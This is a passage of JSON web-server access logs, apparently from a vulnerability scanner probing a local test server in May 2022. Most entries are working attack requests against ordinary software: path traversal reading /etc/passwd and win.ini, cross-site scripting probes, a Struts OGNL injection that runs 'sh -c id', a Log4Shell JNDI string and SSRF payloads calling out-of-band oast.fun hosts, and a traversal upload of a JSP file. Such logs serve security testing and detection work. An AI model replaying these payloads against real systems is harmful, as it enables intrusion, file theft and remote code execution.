HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gallery/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=0776a6f87a8143af12c1e7bbd0bf4197 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenphoto/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=dff1db99c9ecc3c645a4239e20e8ba32 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hmc/hybris HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/bin/sqlnet.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zabbix/zabbix.php?action=dashboard.list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appspec.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.207","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hybris/hmc/hybris HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/setup-config.php?step=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"--------------------------aadc326f7ae3eac3\x0D\x0AContent-Disposition: form-data; name=\x22name\x22; filename=\x22../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/297MTpZS5d50ieqMDkVfRNnLbdT.jsp\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0A<%\x0D\x0Aout.println(\x22CVE-2022-26352\x22);\x0D\x0A%>\x0D\x0A--------------------------aadc326f7ae3eac3--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/content/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=https://attacker.com","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-post.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\x22%20onmouseover=alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php?wlcms-action=preview HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appspec.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/login?&err=--%3E%3Cscript%3Ealert('297MTrBttxGxvLS2w6xEwn9EMTI')%3C/script%3E%3C!--&lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /haproxy-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MTpZS5d50ieqMDkVfRNnLbdT.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /menu/stapp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wow-company&tab=http://c9v8h8gsmpv8c1qg07h0huk93szy3j8rr.oast.fun/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"username=${jndi:ldap://${hostName}.c9v8h88smpv8c1ig07h0pbyyrp3ehxj3q.oast.fun/test}&password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/upload/web-ftp.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /network-login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=fv_player_stats&player_id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testrail/files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22bulk\x22,\x0D\x0A \x22args\x22:[\x0D\x0A {\x0D\x0A \x22type\x22:\x22add_remote_schema\x22,\x0D\x0A \x22args\x22:{\x0D\x0A \x22name\x22:\x22test\x22,\x0D\x0A \x22definition\x22:{\x0D\x0A \x22url\x22:\x22https://c9v8h8gsmpv8c1qg07h0qgfpqh74jr356.oast.fun\x22,\x0D\x0A \x22headers\x22:[\x0D\x0A ],\x0D\x0A \x22timeout_seconds\x22:60,\x0D\x0A \x22forward_client_headers\x22:true\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk 